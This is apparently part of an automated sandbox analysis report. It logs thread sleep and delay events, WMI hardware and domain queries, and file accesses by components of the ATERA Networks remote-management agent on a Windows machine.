                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598241s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598124s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598016s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597906s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597687s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597571s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597455s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597219s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597109s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596998s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596891s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596781s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596562s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596450s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596343s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7544Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 2356Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep count: 45 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -41505174165846465s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7552Thread sleep count: 7251 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599553s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599431s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599211s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599099s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598970s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598828s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598702s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7552Thread sleep count: 2566 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598592s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598469s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598238s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598124s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598015s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597758s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597488s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597371s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597265s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597156s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597046s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596933s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596828s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596714s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596606s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596472s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596358s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596249s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596140s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596030s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595922s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595812s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595703s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595473s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595250s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595128s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595015s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594906s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594687s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594577s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594250s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594140s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594031s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -593922s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -593810s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -593703s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7684Thread sleep count: 1638 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7976Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7976 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7520 Thread sleep count: 2503 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7656 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6276 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8000 Thread sleep count: 298 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8000 Thread sleep count: 1323 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7600 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4072 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 6632 Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 8100 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 6488 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 8072 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 5868 Thread sleep count: 7309 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096 Thread sleep count: 37 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096 Thread sleep time: -34126476536362649s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6684 Thread sleep count: 2259 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 504 Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 4856 Thread sleep count: 1123 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 7796 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 6612 Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 8152 Thread sleep count: 161 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 5568 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 712 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 6820 Thread sleep count: 809 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 4256 Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 4256 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 4256 Thread sleep time: -598572s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 3308 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 4360 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 5292 Thread sleep count: 3610 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 4696 Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 4696 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 4136 Thread sleep count: 198 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3776 Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3872 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe File opened: PhysicalDrive0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Windows\System32\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Last function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599546
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599218
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598500
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598338
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598191
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597845
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597509
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597390
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597078
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596750
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596443
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596234
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596046
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595671
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595527
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595377
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595244
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 598572
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1
